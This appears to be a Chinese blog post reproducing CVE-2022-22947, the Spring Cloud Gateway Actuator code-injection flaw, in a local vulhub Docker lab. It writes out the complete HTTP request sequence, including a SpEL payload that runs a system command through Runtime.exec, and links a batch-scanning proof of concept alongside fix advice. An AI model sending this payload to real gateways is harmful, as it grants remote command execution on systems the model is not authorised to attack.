Spring Cloud Gateway_CVE-2022-22947漏洞复现

安全混子

已于 2023-01-13 11:42:25 修改

阅读量4.8k

点赞数 2

分类专栏： Java安全文章标签：安全 java spring cloud

于 2022-03-05 00:10:03 首次发布

本文链接：https://blog.csdn.net/xd_2021/article/details/123287328

版权

Java安全专栏收录该内容

6 篇文章 1 订阅

订阅专栏

漏洞描述

Spring Cloud Gateway 远程代码执行漏洞（CVE-2022-22947）发生在Spring Cloud Gateway应用程序的Actuator端点，其在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可通过该漏洞恶意创建允许在远程主机上执行任意远程执行的请求

影响版本

Spring Cloud Gateway 3.1.x < 3.1.1
Spring Cloud Gateway < 3.0.7

漏洞复现

环境搭建

dokcer pull vulhub/spring-cloud-gateway:3.1.0
docker run -itd -p 5000:8080 --name spring vulhub/spring-cloud-gateway:3.1.0
最后访问http://ip:5000

过程

添加一个spel表达式的路由，数据包如下

POST /actuator/gateway/routes/xd HTTP/1.1
Host: localhost:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Type: application/json
Content-Length: 364

{
      "id": "xd",
      "filters": [{
        "name": "AddResponseHeader",
        "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"}
        }],
      "uri": "http://example.com",
      "order": 0
    }

在这里插入图片描述
2. 触发路由生效，数据包如下

POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

在这里插入图片描述
3. 查看执行结果，数据包如下

GET /actuator/gateway/routes/xd HTTP/1.1
Host: localhost:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded

在这里插入图片描述
4. 清理路由，数据包如下

DELETE /actuator/gateway/routes/xd HTTP/1.1
Host: localhost:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

在这里插入图片描述
5. 重复2，使清除路由生效

批量url检测

github：https://github.com/Xd-tl/CVE-2022-22947-Rce_POC
要是能来一个星星那就更好了

漏洞修复

升级到安全版本
修改Spring配置，禁止访问Spring Cloud Gateway actuator端点

大家可以关注菜鸡的公众号，有什么好想法也可以让我学习一下，有什么问题可以一块解决，由于二维码违规，下面是base64编码的文字

5b6u5L+h5YWs5LyX5Y+34oCc5a6J5YWo5re35a2Q4oCd77yM5Y+v5Lul55So5b6u5L+h5pCc5LiA5pCc77yM5q2j5Zyo5a6M5ZaE5LitLi4uLi4u

安全混子

关注

2
点赞
踩
1

收藏

觉得还不错? 一键收藏
打赏
2
评论
Spring Cloud Gateway_CVE-2022-22947漏洞复现

目录漏洞描述影响版本漏洞复现环境搭建过程批量url检测漏洞修复漏洞描述Spring Cloud Gateway 远程代码执行漏洞（CVE-2022-22947）发生在Spring Cloud Gateway应用程序的Actuator端点，其在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可通过该漏洞恶意创建允许在远程主机上执行任意远程执行的请求
复制链接

扫一扫